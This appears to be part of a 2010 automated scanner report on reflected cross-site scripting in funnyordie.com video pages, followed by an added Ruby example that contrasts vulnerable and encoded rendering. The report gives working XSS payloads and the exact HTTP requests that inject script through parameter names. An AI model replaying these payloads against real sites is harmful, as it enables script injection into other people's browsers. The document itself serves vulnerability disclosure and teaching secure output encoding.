The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04ba"><script>alert(1)</script>7483be9e117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videos/c8863726da/judd-apatow-psa?b04ba"><script>alert(1)</script>7483be9e117=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "4ce3ab5024f1bef89e87010b81ee2f2b"
X-Runtime: 658
X-Varnish: 1401058457
X-Varnish: 573812781
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:01:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:01:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 297743
1.101. http://www.funnyordie.com/videos/c8863726da/judd-apatow-psa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /videos/c8863726da/judd-apatow-psa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c6e"-alert(1)-"a128f0045a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videos/c8863726da/judd-apatow-psa?d1c6e"-alert(1)-"a128f0045a7=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "d6e73bd9c98c6652b30d9d377d927f78"
X-Runtime: 878
X-Varnish: 1401058524
X-Varnish: 573812846
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:01:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 297720
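Worked example (added here; not code from the Funny or Die application or from the scanner). Every finding in this section is one of two cases: the raw name of a query parameter is reflected either into a double-quoted HTML attribute value (payload of the form x"><script>alert(1)</script>y) or into a double-quoted JavaScript string (payload of the form x"-alert(1)-"y). The block below models both reflection points, shows the output encoding that neutralises each, reproduces the scanner's "echoed unmodified" check, and classifies which of the two contexts a marker lands in. Ruby is used because the Status: and X-Runtime: response headers above are characteristic of a Rails stack; the <link> and <script> lines are assumed stand-ins for wherever the real templates echo the query string, and the payload constants are copied from issues 1.100 and 1.101.

```ruby
require 'erb'
require 'json'

# Assumed stand-in for the page path in issues 1.100 and 1.101.
PATH = '/videos/c8863726da/judd-apatow-psa'.freeze

# Payloads copied from the two findings above (1.100 and 1.101).
ATTRIBUTE_PAYLOAD = 'b04ba"><script>alert(1)</script>7483be9e117'.freeze
JS_STRING_PAYLOAD = 'd1c6e"-alert(1)-"a128f0045a7'.freeze

# Vulnerable rendering (assumed locations): the raw query string is interpolated
# into a double-quoted attribute value and into a double-quoted JavaScript
# string, so a parameter *name* containing a double quote closes either context.
def render_vulnerable(query_string)
  <<~HTML
    <link rel="canonical" href="#{PATH}?#{query_string}">
    <script>var pageUrl = "#{PATH}?#{query_string}";</script>
  HTML
end

# Hardened rendering: encode for the context the data lands in.
#  - attribute value: HTML-entity encode, so " becomes &quot; and < becomes &lt;
#  - JavaScript string: emit a JSON string literal (quotes and backslashes are
#    escaped), then escape "</" so a "</script>" inside the data cannot end the
#    script block early; String#to_json does not escape "/" on its own.
def render_hardened(query_string)
  attr_safe = ERB::Util.html_escape(query_string)
  js_safe = "#{PATH}?#{query_string}".to_json.gsub('</') { '<\/' }
  <<~HTML
    <link rel="canonical" href="#{PATH}?#{attr_safe}">
    <script>var pageUrl = #{js_safe};</script>
  HTML
end

# The scanner's proof-of-concept check: send the payload as a parameter name
# with the value "1" and report a finding if it comes back byte-for-byte.
def reflected_unmodified?(renderer, payload)
  renderer.call("#{payload}=1").include?(payload)
end

# Classify the context immediately before one reflection point, mirroring the
# report's "HTML tag attribute" versus "JavaScript string" labels. The quote
# counting is deliberately simple: a triage aid, not an HTML parser.
def context_before(before)
  open_script = before.rindex('<script')
  close_script = before.rindex('</script') || -1
  if open_script && open_script > close_script
    tag_end = before.index('>', open_script) || open_script
    script_body = before[(tag_end + 1)..-1]
    return script_body.count('"').odd? ? :js_string : :js_code
  end
  open_tag = before.rindex('<')
  close_tag = before.rindex('>') || -1
  if open_tag && open_tag > close_tag
    return before[open_tag..-1].count('"').odd? ? :attribute_value : :tag
  end
  :html_text
end

# Every context a marker string is reflected into, in document order.
def reflection_contexts(body, marker)
  contexts = []
  pos = 0
  while (at = body.index(marker, pos))
    contexts << context_before(body[0...at])
    pos = at + marker.length
  end
  contexts
end

if __FILE__ == $PROGRAM_NAME
  [ATTRIBUTE_PAYLOAD, JS_STRING_PAYLOAD].each do |payload|
    puts "vulnerable echoes #{payload.inspect}: #{reflected_unmodified?(method(:render_vulnerable), payload)}"
    puts "hardened echoes   #{payload.inspect}: #{reflected_unmodified?(method(:render_hardened), payload)}"
  end
  p reflection_contexts(render_vulnerable('zz9canary=1'), 'zz9canary')
end
```

Running the file prints true/true for the vulnerable renderer, false/false for the hardened one, and [:attribute_value, :js_string] for a harmless canary, which is the same pair of contexts the report assigns to each path. Note that the hardened version still carries the attacker's data (as &quot;&gt;&lt;script&gt;... in the attribute and as \" inside the JS literal); it is the encoding, not filtering, that removes the finding.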